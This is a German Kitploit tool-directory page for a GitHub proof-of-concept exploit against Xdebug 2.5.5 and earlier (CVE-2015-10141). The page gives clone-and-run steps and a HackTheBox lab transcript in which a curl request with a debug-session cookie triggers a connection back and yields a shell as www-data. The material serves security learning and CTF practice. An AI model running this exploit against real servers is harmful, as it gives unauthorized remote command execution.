Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2015-10141-Xdebug — Proof-of-Concept-Exploit-Skript für Xdebug 2.5.5 und frühere Versionen (CVE-2015-10141). | Kitploit
Tools/GitHubGitHub/n0m4d22/poc-cve-2015-10141-xdebug
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubn0m4d22/poc-cve-2015-10141-xdebug

PoC-CVE-2015-10141-Xdebug

Proof-of-Concept-Exploit-Skript für Xdebug 2.5.5 und frühere Versionen (CVE-2015-10141).

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC-CVE-2015-10141

Eigener Python-Exploit für Xdebug ≤ 2.5.5 (CVE-2015-10141).


Beschreibung

Dieses Repository enthält meinen Proof-of-Concept (PoC) Exploit für die Xdebug-Schwachstelle zur Remote-Codeausführung in den Versionen 2.5.5 und früher.
Das Skript nutzt das nicht authentifizierte Debugging-Protokoll, das auf Port 9000 offengelegt ist, um eine Remote-Befehlsausführung zu erreichen.

  • Schwachstelle: CVE-2015-10141
  • Schwachstellentyp: Remote-Codeausführung (RCE)
  • Betroffene Software: Xdebug ≤ 2.5.5

Verwendung

root@kitploit:~
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py

Wenn du dazu aufgefordert wirst, gib die Ziel-IP ein, auf der Xdebug gehostet wird.

Demonstration aus meinem kürzlichen HackTheBox Olympus (Medium) Write-up :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data

Voraussetzungen

  • Python 3.x
  • Ein Zielsystem, auf dem Xdebug ≤ 2.5.5 mit aktiviertem Remote-Debugging läuft

Haftungsausschluss

Dieses Projekt dient ausschließlich zu Bildungszwecken.

Verwende diesen Exploit nicht gegen Systeme ohne ausdrückliche Genehmigung. Ich übernehme keine Verantwortung für Missbrauch dieses Codes.


Referenzen

  • NVD – CVE-2015-10141
  • ExploitDB – 44568
  • Xdebug Offizielle Website
Tool herunterladen